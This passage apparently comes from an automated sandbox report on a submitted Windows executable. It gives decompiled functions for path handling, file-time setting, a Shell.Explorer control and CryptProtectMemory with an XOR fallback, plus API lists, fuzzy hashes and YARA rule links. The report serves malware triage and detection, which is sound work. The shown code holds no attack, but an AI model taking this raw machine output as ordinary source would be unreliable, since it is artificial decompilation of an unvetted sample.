                0x00cca086
                0x00cca089
                0x00cca08a
                0x00cca0ab
                0x00cca0ab
                0x00cca0ad
                0x00000000
                0x00000000
                0x00cca092
                0x00cca094
                0x00cca096
                0x00cca098
                0x00cca09a
                0x00cca09c
                0x00cca09e
                0x00cca0a9
                0x00000000
                0x00cca0a9
                0x00cca09e
                0x00cca09a
                0x00000000
                0x00cca096
                0x00cca0af
                0x00cca0b1
                0x00cca0b4
                0x00cca0cd
                0x00cca0cd
                0x00cca0cf
                0x00cca0d2
                0x00cca0e2
                0x00cca0e4
                0x00cca0e4
                0x00cca0d4
                0x00cca0d4
                0x00cca0d7
                0x00000000
                0x00cca0d9
                0x00cca0d9
                0x00cca0dc
                0x00000000
                0x00cca0de
                0x00cca0de
                0x00cca0de
                0x00cca0dc
                0x00cca0d7
                0x00cca0f2
                0x00cca0f6
                0x00cca104
                0x00cca109
                0x00cca11e
                0x00cca120
                0x00cca126
                0x00cca129
                0x00cca15b
                0x00cca15b
                0x00cca160
                0x00cca166
                0x00cca166
                0x00cca16d
                0x00cca187
                0x00cca187
                0x00cca188
                0x00cca18e
                0x00cca194
                0x00cca195
                0x00cca196
                0x00cca19b
                0x00cca19e
                0x00cca1a0
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cca16f
                0x00cca16f
                0x00cca175
                0x00cca177
                0x00000000
                0x00cca179
                0x00cca179
                0x00cca17c
                0x00000000
                0x00cca17e
                0x00cca17e
                0x00cca185
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cca185
                0x00cca17c
                0x00cca177
                0x00000000
                0x00cca1a2
                0x00cca1aa
                0x00cca1b0
                0x00cca1b2
                0x00cca1b2
                0x00cca1ba
                0x00cca1bf
                0x00cca1c7
                0x00cca1ca
                0x00cca1cc
                0x00cca1e0
                0x00cca1e5
                0x00cca12b
                0x00cca12b
                0x00cca12c
                0x00cca12d
                0x00cca12e
                0x00cca12f
                0x00cca137
                0x00cca137
                0x00cca137
                0x00cca139
                0x00cca13c
                0x00cca13f
                0x00cca13f
                0x00cca145
                0x00cca0b6
                0x00cca0b6
                0x00cca0b9
                0x00cca0bb
                0x00000000
                0x00cca0bd
                0x00cca0bd
                0x00cca0c0
                0x00cca0c1
                0x00cca0c2
                0x00cca0c3
                0x00cca0c8
                0x00cca0bb
                0x00cca147
                0x00cca14c
                0x00cca157
                0x00000000
                0x00000000
                0x00000000
                0x00cca025
                0x00cc9ff9
                0x00cc9ffb
                0x00cca057
                0x00cca05b
                0x00cca05b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cc9f90
                0x00cc9f93
                0x00cc9f96
                0x00cc9f99
                0x00cc9f9c
                0x00cc9f9f
                0x00cc9fa2
                0x00cc9fa2
                0x00000000
                0x00cc9f5f
                0x00cc9f41
                0x00cc9f41
                0x00cc9fad
                0x00cc9faf
                0x00000000
                0x00cc9fb4
                0x00cc9e83
                0x00cc9e83
                0x00cc9e86
                0x00cc9e8f
                0x00cc9e92
                0x00cc9e99
                0x00cc9e9b
                0x00cc9eb4
                0x00cc9eb5
                0x00cc9eb6
                0x00cc9eb8
                0x00cc9ebd
                0x00cc9e9d
                0x00cc9e9d
                0x00cc9ea0
                0x00cc9ea1
                0x00cc9ea3
                0x00cc9ea5
                0x00cc9ea7
                0x00cc9eac
                0x00cc9eac
                0x00cc9ec0
                0x00cc9ec2
                0x00cc9ec4
                0x00000000
                0x00000000
                0x00cc9eca
                0x00cc9ecd
                0x00cc9ecf
                0x00cc9ed1
                0x00000000
                0x00cc9ed3
                0x00cc9ed3
                0x00cc9ed6
                0x00000000
                0x00cc9ed6
                0x00000000
                0x00cc9ed1
                0x00cc9fb5
                0x00cc9fb8
                0x00cc9fbd
                0x00000000
                0x00cc9fc0
                0x00cc9e53
                0x00cc9e53
                0x00cc9e5a
                0x00cc9e5b
                0x00cc9e5d
                0x00cc9e62
                0x00cc9fc1
                0x00cc9fc5
                0x00cc9fc5
                0x00000000

                APIs
                • _free.LIBCMT ref: 00CC9FAF
                  • Part of subcall function 00CC7DBB: IsProcessorFeaturePresent.KERNEL32(00000017,00CC7DAA,0000002C,00CDA968,00CCAF68,00000000,00000000,00CC8599,?,?,00CC7DB7,00000000,00000000,00000000,00000000,00000000), ref: 00CC7DBD
                  • Part of subcall function 00CC7DBB: GetCurrentProcess.KERNEL32(C0000417,00CDA968,0000002C,00CC7AE8,00000016,00CC8599), ref: 00CC7DDF
                  • Part of subcall function 00CC7DBB: TerminateProcess.KERNEL32(00000000), ref: 00CC7DE6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                • String ID: *?$.
                • API String ID: 2667617558-3972193922
                • Opcode ID: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
                • Instruction ID: 3c5c86001f909313f345ad22d013457a92b577063b9663b4c4f5a957a337db2f
                • Opcode Fuzzy Hash: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
                • Instruction Fuzzy Hash: 5451B076E0020AAFDF14CFA8C885FADBBB5EF98314F24816DE855E7341E6319E019B50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA7570, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                Download Yara Rule
                C-Code - Quality: 80%
                			E00CA7570(void* __ecx, void* __edx) {
				void* __esi;
				char _t54;
				signed int _t57;
				void* _t61;
				signed int _t62;
				signed int _t68;
				signed int _t85;
				void* _t90;
				void* _t99;
				void* _t101;
				intOrPtr* _t106;
				void* _t108;

				_t99 = __edx;
				E00CBD870(E00CD1298, _t108);
				E00CBD940();
				_t106 =  *((intOrPtr*)(_t108 + 0xc));
				if( *_t106 == 0) {
					L3:
					_t101 = 0x802;
					E00CAFAB1(_t108 - 0x1010, _t106, 0x802);
					L4:
					_t81 =  *((intOrPtr*)(_t108 + 8));
					E00CA7773(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x407c, 0x800);
					_t113 =  *((short*)(_t108 - 0x407c)) - 0x3a;
					if( *((short*)(_t108 - 0x407c)) == 0x3a) {
						__eflags =  *((char*)(_t108 + 0x10));
						if(__eflags == 0) {
							E00CAFA89(__eflags, _t108 - 0x1010, _t108 - 0x407c, _t101);
							E00CA6EF9(_t108 - 0x307c);
							_push(0);
							_t54 = E00CAA1B1(_t108 - 0x307c, _t99, __eflags, _t106, _t108 - 0x307c);
							_t85 =  *(_t108 - 0x2074);
							 *((char*)(_t108 + 0x13)) = _t54;
							__eflags = _t85 & 0x00000001;
							if((_t85 & 0x00000001) != 0) {
								__eflags = _t85 & 0xfffffffe;
								E00CAA12F(_t106, _t85 & 0xfffffffe);
							}
							E00CA943C(_t108 - 0x2034);
							 *((intOrPtr*)(_t108 - 4)) = 1;
							_t57 = E00CA9BE6(_t108 - 0x2034, __eflags, _t108 - 0x1010, 0x11);
							__eflags = _t57;
							if(_t57 != 0) {
								_push(0);
								_push(_t108 - 0x2034);
								_push(0);
								_t68 = E00CA399D(_t81, _t99);
								__eflags = _t68;
								if(_t68 != 0) {
									E00CA94DA(_t108 - 0x2034);
								}
							}
							E00CA943C(_t108 - 0x50a0);
							__eflags =  *((char*)(_t108 + 0x13));
							 *((char*)(_t108 - 4)) = 2;
							if( *((char*)(_t108 + 0x13)) != 0) {
								_t62 = E00CA9768(_t108 - 0x50a0, _t106, _t106, 5);
								__eflags = _t62;
								if(_t62 != 0) {
									SetFileTime( *(_t108 - 0x509c), _t108 - 0x2054, _t108 - 0x204c, _t108 - 0x2044);
								}
							}
							E00CAA12F(_t106,  *(_t108 - 0x2074));
							E00CA946E(_t108 - 0x50a0);
							_t90 = _t108 - 0x2034;
						} else {
							E00CA943C(_t108 - 0x60c4);
							_push(1);
							_push(_t108 - 0x60c4);
							_push(0);
							 *((intOrPtr*)(_t108 - 4)) = 0;
							E00CA399D(_t81, _t99);
							_t90 = _t108 - 0x60c4;
						}
						_t61 = E00CA946E(_t90);
					} else {
						E00CA6BF5(_t113, 0x53, _t81 + 0x1e, _t106);
						_t61 = E00CA6E03(0xce00e0, 3);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
					return _t61;
				}
				_t112 =  *((intOrPtr*)(_t106 + 2));
				if( *((intOrPtr*)(_t106 + 2)) != 0) {
					goto L3;
				} else {
					_t101 = 0x802;
					E00CAFAB1(_t108 - 0x1010, 0xcd2490, 0x802);
					E00CAFA89(_t112, _t108 - 0x1010, _t106, 0x802);
					goto L4;
				}
			}















                0x00ca7570
                0x00ca7575
                0x00ca757f
                0x00ca7586
                0x00ca758f
                0x00ca75be
                0x00ca75be
                0x00ca75cc
                0x00ca75d1
                0x00ca75d1
                0x00ca75e1
                0x00ca75e6
                0x00ca75ee
                0x00ca760d
                0x00ca7611
                0x00ca764e
                0x00ca7659
                0x00ca7666
                0x00ca7669
                0x00ca766e
                0x00ca7674
                0x00ca7677
                0x00ca767a
                0x00ca767c
                0x00ca7681
                0x00ca7681
                0x00ca768c
                0x00ca7699
                0x00ca76a7
                0x00ca76ac
                0x00ca76ae
                0x00ca76b0
                0x00ca76b9
                0x00ca76ba
                0x00ca76bb
                0x00ca76c0
                0x00ca76c2
                0x00ca76ca
                0x00ca76ca
                0x00ca76c2
                0x00ca76d5
                0x00ca76da
                0x00ca76de
                0x00ca76e2
                0x00ca76ed
                0x00ca76f2
                0x00ca76f4
                0x00ca7711
                0x00ca7711
                0x00ca76f4
                0x00ca771e
                0x00ca7729
                0x00ca772e
                0x00ca7613
                0x00ca7619
                0x00ca761e
                0x00ca7628
                0x00ca7629
                0x00ca762c
                0x00ca762f
                0x00ca7634
                0x00ca7634
                0x00ca7734
                0x00ca75f0
                0x00ca75f7
                0x00ca7603
                0x00ca7603
                0x00ca773f
                0x00ca7749
                0x00ca7749
                0x00ca7591
                0x00ca7595
                0x00000000
                0x00ca7597
                0x00ca7597
                0x00ca75a9
                0x00ca75b7
                0x00000000
                0x00ca75b7

                APIs
                • __EH_prolog.LIBCMT ref: 00CA7575
                • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA7711
                  • Part of subcall function 00CAA12F: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CA9F65,?,?,?,00CA9DFE,?,00000001,00000000,?,?), ref: 00CAA143
                  • Part of subcall function 00CAA12F: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CA9F65,?,?,?,00CA9DFE,?,00000001,00000000,?,?), ref: 00CAA174
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$Attributes$H_prologTime
                • String ID: :
                • API String ID: 1861295151-336475711
                • Opcode ID: 467f2e99ed642c18e3598d48fef478fd1394f43af7506a4284263223195b8581
                • Instruction ID: 0de854daaf3fce5c6446330a2abc375a04f06864f50cdf375585443a9a3b3661
                • Opcode Fuzzy Hash: 467f2e99ed642c18e3598d48fef478fd1394f43af7506a4284263223195b8581
                • Instruction Fuzzy Hash: 5D41B471805219AADB25EB60CC56EEF777CEF46308F0041E9B605A3092DB705F89EFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CAB32C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                Download Yara Rule
                C-Code - Quality: 81%
                			E00CAB32C(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4096;
				short _v4100;
				signed short* _t30;
				long _t32;
				short _t33;
				void* _t39;
				signed short* _t52;
				void* _t53;
				signed short* _t62;
				void* _t66;
				intOrPtr _t69;
				signed short* _t71;
				intOrPtr _t73;

				E00CBD940();
				_t71 = _a4;
				if( *_t71 != 0) {
					E00CAB4C6(_t71);
					_t66 = E00CC2B33(_t71);
					_t30 = E00CAB4F2(_t71);
					__eflags = _t30;
					if(_t30 == 0) {
						_t32 = GetCurrentDirectoryW(0x7ff,  &_v4100);
						__eflags = _t32;
						if(_t32 == 0) {
							L22:
							_t33 = 0;
							__eflags = 0;
							L23:
							goto L24;
						}
						__eflags = _t32 - 0x7ff;
						if(_t32 > 0x7ff) {
							goto L22;
						}
						__eflags = E00CAB5CD( *_t71 & 0x0000ffff);
						if(__eflags == 0) {
							E00CAAEA5(__eflags,  &_v4100, 0x800);
							_t39 = E00CC2B33( &_v4100);
							_t69 = _a12;
							__eflags = _t69 - _t39 + _t66 + 4;
							if(_t69 <= _t39 + _t66 + 4) {
								goto L22;
							}
							E00CAFAB1(_a8, L"\\\\?\\", _t69);
							E00CAFA89(__eflags, _a8,  &_v4100, _t69);
							__eflags =  *_t71 - 0x2e;
							if(__eflags == 0) {
								__eflags = E00CAB5CD(_t71[1] & 0x0000ffff);
								if(__eflags != 0) {
									_t71 =  &(_t71[2]);
									__eflags = _t71;
								}
							}
							L19:
							_push(_t69);
							L20:
							_push(_t71);
							L21:
							_push(_a8);
							E00CAFA89(__eflags);
							_t33 = 1;
							goto L23;
						}
						_t13 = _t66 + 6; // 0x6
						_t69 = _a12;
						__eflags = _t69 - _t13;
						if(_t69 <= _t13) {
							goto L22;
						}
						E00CAFAB1(_a8, L"\\\\?\\", _t69);
						_v4096 = 0;
						E00CAFA89(__eflags, _a8,  &_v4100, _t69);
						goto L19;
					}
					_t52 = E00CAB4C6(_t71);
					__eflags = _t52;
					if(_t52 == 0) {
						_t53 = 0x5c;
						__eflags =  *_t71 - _t53;
						if( *_t71 != _t53) {
							goto L22;
						}
						_t62 =  &(_t71[1]);
						__eflags =  *_t62 - _t53;
						if( *_t62 != _t53) {
							goto L22;
						}
						_t73 = _a12;
						_t9 = _t66 + 6; // 0x6
						__eflags = _t73 - _t9;
						if(_t73 <= _t9) {
							goto L22;
						}
						E00CAFAB1(_a8, L"\\\\?\\", _t73);
						E00CAFA89(__eflags, _a8, L"UNC", _t73);
						_push(_t73);
						_push(_t62);
						goto L21;
					}
					_t2 = _t66 + 4; // 0x4
					__eflags = _a12 - _t2;
					if(_a12 <= _t2) {
						goto L22;
					}
					E00CAFAB1(_a8, L"\\\\?\\", _a12);
					_push(_a12);
					goto L20;
				} else {
					_t33 = 0;
					L24:
					return _t33;
				}
			}
















                0x00cab334
                0x00cab33a
                0x00cab341
                0x00cab34d
                0x00cab35a
                0x00cab35c
                0x00cab361
                0x00cab363
                0x00cab3e9
                0x00cab3ef
                0x00cab3f1
                0x00cab4b0
                0x00cab4b0
                0x00cab4b0
                0x00cab4b2
                0x00000000
                0x00cab4b3
                0x00cab3f7
                0x00cab3f9
                0x00000000
                0x00000000
                0x00cab408
                0x00cab40a
                0x00cab44f
                0x00cab45b
                0x00cab465
                0x00cab469
                0x00cab46b
                0x00000000
                0x00000000
                0x00cab476
                0x00cab486
                0x00cab48b
                0x00cab48f
                0x00cab49b
                0x00cab49d
                0x00cab49f
                0x00cab49f
                0x00cab49f
                0x00cab49d
                0x00cab4a2
                0x00cab4a2
                0x00cab4a3
                0x00cab4a3
                0x00cab4a4
                0x00cab4a4
                0x00cab4a7
                0x00cab4ac
                0x00000000
                0x00cab4ac
                0x00cab40c
                0x00cab40f
                0x00cab412
                0x00cab414
                0x00000000
                0x00000000
                0x00cab423
                0x00cab42a
                0x00cab43c
                0x00000000
                0x00cab43c
                0x00cab366
                0x00cab36b
                0x00cab36d
                0x00cab395
                0x00cab396
                0x00cab399
                0x00000000
                0x00000000
                0x00cab39f
                0x00cab3a2
                0x00cab3a5
                0x00000000
                0x00000000
                0x00cab3ab
                0x00cab3ae
                0x00cab3b1
                0x00cab3b3
                0x00000000
                0x00000000
                0x00cab3c2
                0x00cab3d0
                0x00cab3d5
                0x00cab3d6
                0x00000000
                0x00cab3d6
                0x00cab36f
                0x00cab372
                0x00cab375
                0x00000000
                0x00000000
                0x00cab386
                0x00cab38b
                0x00000000
                0x00cab343
                0x00cab343
                0x00cab4b4
                0x00cab4b8
                0x00cab4b8

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID: UNC$\\?\
                • API String ID: 0-253988292
                • Opcode ID: 9e7be3b5b11b9f8f894c0bbf2f417c25637461f779a7ea870883397d0fa63359
                • Instruction ID: 624cef2ecff8747809ea8b13227eeb3229829e1a55354d09d1e7a81015232153
                • Opcode Fuzzy Hash: 9e7be3b5b11b9f8f894c0bbf2f417c25637461f779a7ea870883397d0fa63359
                • Instruction Fuzzy Hash: 3841CB3140021B7ACF20AF61DC41EEB7769AF0B759F00806AF95493153D7749E51EBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB8A07, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                Download Yara Rule
                C-Code - Quality: 70%
                			E00CB8A07(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				void* __esi;
				intOrPtr _t18;
				char _t19;
				intOrPtr* _t23;
				signed int _t25;
				void* _t26;
				intOrPtr* _t28;
				void* _t38;
				void* _t43;
				intOrPtr _t44;
				signed int* _t48;

				_t44 = _a4;
				_t43 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) = _t44;
				_t18 = E00CBD82C(__edx, _t44, __eflags, 0x30);
				_a4 = _t18;
				if(_t18 == 0) {
					_t19 = 0;
					__eflags = 0;
				} else {
					_t19 = E00CB83B5(_t18);
				}
				 *((intOrPtr*)(_t43 + 0xc)) = _t19;
				if(_t19 == 0) {
					return _t19;
				} else {
					 *((intOrPtr*)(_t19 + 0x18)) = _t44;
					E00CB9184( *((intOrPtr*)(_t43 + 0xc)), L"Shell.Explorer");
					E00CB931D( *((intOrPtr*)(_t43 + 0xc)), 1);
					E00CB92D3( *((intOrPtr*)(_t43 + 0xc)), 1);
					_t23 = E00CB9238( *((intOrPtr*)(_t43 + 0xc)));
					_t28 = _t23;
					if(_t28 == 0) {
						L7:
						__eflags =  *(_t43 + 0x10);
						if( *(_t43 + 0x10) != 0) {
							E00CB8581(_t43);
							_t25 =  *(_t43 + 0x10);
							_push(0);
							_push(0);
							_push(0);
							 *((char*)(_t43 + 0x25)) = 0;
							_t38 =  *_t25;
							_push(0);
							__eflags =  *(_t43 + 0x20);
							if( *(_t43 + 0x20) == 0) {
								_push(L"about:blank");
							} else {
								_push( *(_t43 + 0x20));
							}
							_t23 =  *((intOrPtr*)(_t38 + 0x2c))(_t25);
						}
						L12:
						return _t23;
					}
					_t10 = _t43 + 0x10; // 0x10
					_t48 = _t10;
					_t26 =  *((intOrPtr*)( *_t28))(_t28, 0xcd412c, _t48);
					_t23 =  *((intOrPtr*)( *_t28 + 8))(_t28);
					if(_t26 >= 0) {
						goto L7;
					}
					 *_t48 =  *_t48 & 0x00000000;
					goto L12;
				}
			}














                0x00cb8a08
                0x00cb8a0d
                0x00cb8a11
                0x00cb8a14
                0x00cb8a19
                0x00cb8a20
                0x00cb8a2b
                0x00cb8a2b
                0x00cb8a22
                0x00cb8a24
                0x00cb8a24
                0x00cb8a2d
                0x00cb8a32
                0x00cb8abd
                0x00cb8a38
                0x00cb8a3a
                0x00cb8a45
                0x00cb8a4f
                0x00cb8a59
                0x00cb8a61
                0x00cb8a66
                0x00cb8a6a
                0x00cb8a8c
                0x00cb8a8e
                0x00cb8a91
                0x00cb8a95
                0x00cb8a9a
                0x00cb8a9d
                0x00cb8a9e
                0x00cb8a9f
                0x00cb8aa0
                0x00cb8aa3
                0x00cb8aa5
                0x00cb8aa6
                0x00cb8aa9
                0x00cb8ab0
                0x00cb8aab
                0x00cb8aab
                0x00cb8aab
                0x00cb8ab6
                0x00cb8ab6
                0x00cb8ab9
                0x00000000
                0x00cb8aba
                0x00cb8a6e
                0x00cb8a6e
                0x00cb8a78
                0x00cb8a7f
                0x00cb8a84
                0x00000000
                0x00000000
                0x00cb8a86
                0x00000000
                0x00cb8a86

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID: Shell.Explorer$about:blank
                • API String ID: 0-874089819
                • Opcode ID: f8d231274c26b9299e3fbc2e9379a53b99851b837f506d5e05b169a49901ba09
                • Instruction ID: 1e43e1f64706515be0839aeb5cdc88308ef8ce315b80679284ce1f37ce98d8d8
                • Opcode Fuzzy Hash: f8d231274c26b9299e3fbc2e9379a53b99851b837f506d5e05b169a49901ba09
                • Instruction Fuzzy Hash: 91216F71640616BFD7049FB4C891EAAB3ACFF45711F04812AF2158B681DF70E915EBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CAE862, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                Download Yara Rule
                C-Code - Quality: 20%
                			E00CAE862(void* __ebx, void* __edi, intOrPtr _a4, signed int _a8, char _a12, intOrPtr _a16) {
				void* __esi;
				void* __ebp;
				intOrPtr* _t11;
				intOrPtr* _t12;
				signed char _t13;
				void* _t17;
				signed char _t18;
				void* _t20;
				signed int _t22;
				signed int _t30;
				void* _t31;
				void* _t32;
				intOrPtr _t33;
				signed int _t36;

				_t32 = __edi;
				_t17 = __ebx;
				_t11 =  *0xce7358; // 0x0
				if(_t11 == 0) {
					E00CAE7E3(0xce7350);
					_t11 =  *0xce7358; // 0x0
				}
				_t36 = _a8;
				_t22 = _t36 & 0xfffffff0;
				_t30 = 0 | _a16 != 0x00000000;
				if(_a12 == 0) {
					_t12 =  *0xce735c; // 0x0
					if(_t12 == 0) {
						goto L10;
					} else {
						_t13 =  *_t12(_a4, _t22, _t30);
						if(_t13 == 0) {
							_push(L"CryptUnprotectMemory failed");
							goto L6;
						}
					}
				} else {
					if(_t11 == 0) {
						L10:
						_push(_t17);
						_t13 = GetCurrentProcessId();
						_t31 = 0;
						_t18 = _t13;
						if(_t36 != 0) {
							_push(_t32);
							_t33 = _a4;
							_t20 = _t18 + 0x4b;
							do {
								_t13 = _t31 + _t20;
								 *(_t31 + _t33) =  *(_t31 + _t33) ^ _t13;
								_t31 = _t31 + 1;
							} while (_t31 < _t36);
						}
					} else {
						_t13 =  *_t11(_a4, _t22, _t30);
						if(_t13 == 0) {
							_push(L"CryptProtectMemory failed");
							L6:
							_push(0xce00e0);
							_t13 = E00CA6CC9(E00CBE214(E00CA6CCE(_t22)), 0xce00e0, 0xce00e0, 2);
						}
					}
				}
				return _t13;
			}

















                0x00cae862
                0x00cae862
                0x00cae865
                0x00cae86c
                0x00cae873
                0x00cae878
                0x00cae878
                0x00cae87e
                0x00cae885
                0x00cae88b
                0x00cae892
                0x00cae8c7
                0x00cae8ce
                0x00000000
                0x00cae8d0
                0x00cae8d5
                0x00cae8d9
                0x00cae8db
                0x00000000
                0x00cae8db
                0x00cae8d9
                0x00cae894
                0x00cae896
                0x00cae8e2
                0x00cae8e2
                0x00cae8e3
                0x00cae8e9
                0x00cae8eb
                0x00cae8ef
                0x00cae8f1
                0x00cae8f2
                0x00cae8f5
                0x00cae8f8
                0x00cae8fb
                0x00cae8fe
                0x00cae900
                0x00cae901
                0x00cae905
                0x00cae898
                0x00cae89d
                0x00cae8a1
                0x00cae8a3
                0x00cae8a8
                0x00cae8ad
                0x00cae8c0
                0x00cae8c0
                0x00cae8a1
                0x00cae896
                0x00cae909

                APIs
                  • Part of subcall function 00CAE7E3: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CAE802
                  • Part of subcall function 00CAE7E3: GetProcAddress.KERNEL32(00CE7350,CryptUnprotectMemory), ref: 00CAE812
                • GetCurrentProcessId.KERNEL32(?,?,?,00CAE85C), ref: 00CAE8E3
                Strings
                • CryptProtectMemory failed, xrefs: 00CAE8A3
                • CryptUnprotectMemory failed, xrefs: 00CAE8DB
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AddressProc$CurrentProcess
                • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                • API String ID: 2190909847-396321323
                • Opcode ID: 7cec41b20cb21a4b55d52116ade1e61610f342730b777803d366f4f994a6e525
                • Instruction ID: 8950e60b9efe695f62500a9333a4fe6afb6cabbfcdb547737dd837dac182b436
                • Opcode Fuzzy Hash: 7cec41b20cb21a4b55d52116ade1e61610f342730b777803d366f4f994a6e525
                • Instruction Fuzzy Hash: 931127307043572BEB119B3DDC41BBF3799DF86B5CB084129F8109A2D2DB65DE41A2D1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA12D7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E00CA12D7(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
				struct HWND__* _t20;
				struct HWND__* _t21;

				if(_a8 == 0x30) {
					E00CAD6E4(0xce0078, _a4);
				} else {
					_t27 = _a8 - 0x110;
					if(_a8 == 0x110) {
						E00CAD70B(0xce0078, _t27, _a4, _a20, _a28 & 1);
						if((_a28 & 0x00000001) != 0) {
							_t20 =  *0xcddfd4(_a4);
							if(_t20 != 0) {
								_t21 = GetDlgItem(_t20, 0x3021);
								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
									SetWindowTextW(_t21, 0xcd22e4);
								}
							}
						}
					}
				}
				return 0;
			}





                0x00ca12de
                0x00ca1341
                0x00ca12e0
                0x00ca12e0
                0x00ca12e7
                0x00ca12fd
                0x00ca1306
                0x00ca130b
                0x00ca1313
                0x00ca131b
                0x00ca1323
                0x00ca1331
                0x00ca1331
                0x00ca1323
                0x00ca1313
                0x00ca1306
                0x00ca12e7
                0x00ca1349

                APIs
                  • Part of subcall function 00CAD70B: _swprintf.LIBCMT ref: 00CAD731
                  • Part of subcall function 00CAD70B: _strlen.LIBCMT ref: 00CAD752
                  • Part of subcall function 00CAD70B: SetDlgItemTextW.USER32(?,00CDD154,?), ref: 00CAD7B2
                  • Part of subcall function 00CAD70B: GetWindowRect.USER32(?,?), ref: 00CAD7EC
                  • Part of subcall function 00CAD70B: GetClientRect.USER32(?,?), ref: 00CAD7F8
                • GetDlgItem.USER32(00000000,00003021), ref: 00CA131B
                • SetWindowTextW.USER32(00000000,00CD22E4), ref: 00CA1331
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
